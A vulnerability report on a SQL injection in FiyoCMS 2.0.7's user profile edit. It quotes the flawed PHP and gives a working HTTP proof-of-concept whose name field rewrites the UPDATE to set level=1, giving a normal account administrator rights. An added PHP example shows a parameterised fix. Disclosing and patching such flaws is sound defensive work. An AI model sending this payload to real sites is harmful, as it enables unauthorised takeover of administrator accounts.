Good day.
I found an update-type SQL injection vulnerability in FiyoCMS 2.0.7. This vulnerability can lead to normal user privileges being elevated to administrator privileges.
The vulnerability lies in /apps/app_user/sys_user.php
if(isset($_POST['edit'])){
    if(!empty($_POST['email']) AND @ereg("^.+@.+\\..+$",$_POST['email']))
    {
        $qrq = false;
        $_POST['bio'] = htmlentities($_POST['bio']);
        if(empty($_POST['password']) AND empty($_POST['kpassword'])){
            $qrq=$db->update(FDBPrefix.'user',array(
                "name"=>"$_POST[name]",
                "email"=>"$_POST[email]",
                "about"=>"$_POST[bio]"),
                "id=$_SESSION[USER_ID]");
        }
It can be noticed that these two parameters, $_POST[name] and $_POST[email], were taken directly into the database query.
PoC
POST /www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/user/edit HTTP/1.1
Host: 127.0.0.1
Content-Length: 139
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1/www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/user/edit
Accept-Language: zh-CN,zh;q=0.8
Cookie: UM_distinctid=15f6d54e23f539-0723e5e4ddab84-5c153e17-100200-15f6d54e240a17; CNZZDATA1260798858=709893868-1509454193-http%253A%252F%252F127.0.0.1%252F%7C1509803835; PHPSESSID=8d82fdb9a681a4b55ed56fcf8df8fe42
Connection: close

password=&kpassword=&name=xm001",`email`="xxxx@gmail.com",`about`="test",level=1 WHERE id=2%23&email=xxxxx%40gmail.com&bio=wers&edit=Simpan
Then you can get into Backstage.
I hope you can fix it as soon as possible. If there are any questions, please send me the details to my email at xm001test@gmail.com
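Added example, not part of the original report and not FiyoCMS code: the same profile update written with PDO bound parameters and a fixed column list, run against an in-memory SQLite table to show that the `name` value from the request above is stored as plain data and `level` is left alone. The function `updateProfile()`, the table `demo_user`, the starting `level` value and the use of `pdo_sqlite` are assumptions for illustration; the column names are the ones visible in the report.

```php
<?php
// Added example, not FiyoCMS code. updateProfile() and demo_user are
// hypothetical; columns (name, email, about, level, id) come from the report.

function updateProfile(PDO $pdo, int $userId, array $post): bool
{
    // ereg() was removed in PHP 7; filter_var() validates the address instead.
    $email = filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        return false;
    }
    // Fixed column list: request data can never name a column such as level.
    $stmt = $pdo->prepare(
        'UPDATE demo_user SET name = :name, email = :email, about = :about WHERE id = :id'
    );
    // Values travel separately from the SQL text, so quotes, backticks and
    // comment markers inside them are stored, not parsed.
    return $stmt->execute([
        ':name'  => (string)($post['name'] ?? ''),
        ':email' => $email,
        ':about' => (string)($post['bio'] ?? ''),
        ':id'    => $userId, // taken from the session, never from the request
    ]);
}

// Constructed demo data: one non-admin row (level 3 is an arbitrary value).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE demo_user (id INTEGER PRIMARY KEY, name TEXT, email TEXT, about TEXT, level INTEGER)');
$pdo->exec("INSERT INTO demo_user VALUES (2, 'xm001', 'old@example.com', '', 3)");

// The name value from the request in the report, passed as ordinary input.
$post = [
    'name'  => 'xm001",`email`="xxxx@gmail.com",`about`="test",level=1 WHERE id=2#',
    'email' => 'xxxxx@gmail.com',
    'bio'   => 'wers',
];
updateProfile($pdo, 2, $post);

// Check that the string was stored as data and that level was not touched.
$row = $pdo->query('SELECT name, level FROM demo_user WHERE id = 2')->fetch(PDO::FETCH_ASSOC);
var_dump($row['name'] === $post['name'], (int)$row['level'] === 3);
```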